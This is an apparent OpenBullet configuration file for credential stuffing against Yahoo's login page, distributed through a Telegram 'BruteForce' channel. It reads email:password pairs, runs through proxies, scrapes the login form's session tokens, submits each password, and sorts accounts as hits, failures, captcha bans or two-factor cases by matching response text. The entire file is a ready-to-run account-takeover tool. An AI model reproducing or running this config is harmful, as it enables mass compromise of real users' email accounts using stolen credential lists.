[SETTINGS]
{
  "Name": "Yahoo.com",
  "SuggestedBots": 100,
  "MaxCPM": 0,
  "LastModified": "2021-07-24T08:55:23.787583+04:30",
  "AdditionalInfo": "Telegram Channel: T.me/BruteForce | Move 2FA Account To Custom | CPM Rate: 20-200",
  "RequiredPlugins": [],
  "Author": "@TheOwn",
  "Version": "1.2.2",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": true,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
#MailCheck KEYCHECK BanOnToCheck=FALSE 
  KEYCHAIN Failure OR 
    KEY "<USER>" DoesNotContain "@yahoo." 
  KEYCHAIN Success OR 
    KEY "<USER>" Contains "@yahoo." 

#UA FUNCTION GetRandomUA -> VAR "UA" 

#Get REQUEST GET "https://login.yahoo.com/" 
  
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9" 
  HEADER "Accept-Encoding: gzip, deflate, br" 
  HEADER "Accept-Language: en-US,en;q=0.9,fa;q=0.8" 
  HEADER "User-Agent: <UA>" 
  HEADER "Cache-Control: max-age=0" 
  HEADER "Connection: keep-alive" 
  HEADER "Host: login.yahoo.com" 
  HEADER "Referer: https://www.google.com/" 
  HEADER "Sec-Fetch-Dest: document" 
  HEADER "Sec-Fetch-Mode: navigate" 
  HEADER "Sec-Fetch-Site: cross-site" 
  HEADER "Sec-Fetch-User: ?1" 
  HEADER "Upgrade-Insecure-Requests: 1" 

#crumb PARSE "<SOURCE>" LR "<img src=\"/account/js-reporting/?crumb=" "&message" -> VAR "crumb" 

#acrumb PARSE "<SOURCE>" LR "\"acrumb\" value=\"" "\"" -> VAR "acrumb" 

#sessionIndex PARSE "<SOURCE>" LR "sessionIndex\" value=\"" "\"" -> VAR "sessionIndex" 

#Puser REQUEST POST "https://login.yahoo.com/?.intl=jo&.lang=en-JO&src=ym&done=https%3A%2F%2Fmail.yahoo.com%2Fd&add=1" 
  CONTENT "crumb=<crumb>&acrumb=<acrumb>&sessionIndex=<sessionIndex>&displayName=&deviceCapability=%7B%22pa%22%3A%7B%22status%22%3Afalse%7D%7D&username=<USER>&passwd=&signin=Next&persistent=y" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "Accept-Encoding: gzip, deflate, br" 
  HEADER "Accept-Language: en-US,en;q=0.9,fa;q=0.8" 
  HEADER "bucket: mbr-phoenix-gpst" 
  HEADER "Connection: keep-alive" 
  HEADER "Host: login.yahoo.com" 
  HEADER "Origin: https://login.yahoo.com" 
  HEADER "Referer: https://login.yahoo.com/" 
  HEADER "Sec-Fetch-Dest: empty" 
  HEADER "Sec-Fetch-Mode: cors" 
  HEADER "Sec-Fetch-Site: same-origin" 
  HEADER "User-Agent: <UA>" 
  HEADER "X-Requested-With: XMLHttpRequest" 

KEYCHECK BanOnToCheck=FALSE 
  KEYCHAIN Ban OR 
    KEY "recaptcha" 

#Redirect PARSE "<SOURCE>" JSON "location" -> VAR "Redirect" 

#Post REQUEST POST "https://login.yahoo.com/<Redirect>" 
  CONTENT "crumb=yngNQ2EjwSR&acrumb=<acrumb>&sessionIndex=QQ--&displayName=<USER>&passwordContext=normal&password=<PASS>&verifyPassword=Next" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9" 
  HEADER "Accept-Encoding: gzip, deflate, br" 
  HEADER "Accept-Language: en-US,en;q=0.9,fa;q=0.8" 
  HEADER "User-Agent: <UA>" 
  HEADER "Cache-Control: max-age=0" 
  HEADER "Connection: keep-alive" 
  HEADER "Content-Length: 1420" 
  HEADER "Host: login.yahoo.com" 
  HEADER "Origin: https://login.yahoo.com" 
  HEADER "Referer: https://login.yahoo.com/" 
  HEADER "Sec-Fetch-Dest: document" 
  HEADER "Sec-Fetch-Mode: navigate" 
  HEADER "Sec-Fetch-Site: same-origin" 
  HEADER "Sec-Fetch-User: ?1" 
  HEADER "Upgrade-Insecure-Requests: 1" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "Invalid password. Please try again" 
  KEYCHAIN Success OR 
    KEY "Manage Accounts" 
    KEY "Sign Out" 
    KEY "\">Remind me later</a>" 
    KEY "Add a recovery method to make sure you always have access to your account" 
    KEY "href=\"/account/comm-channel/add?" 
    KEY "=\"[state.mailCount]\"></" 
  KEYCHAIN Custom "2FACTOR" OR 
    KEY "For your safety, choose a method below to verify that" 

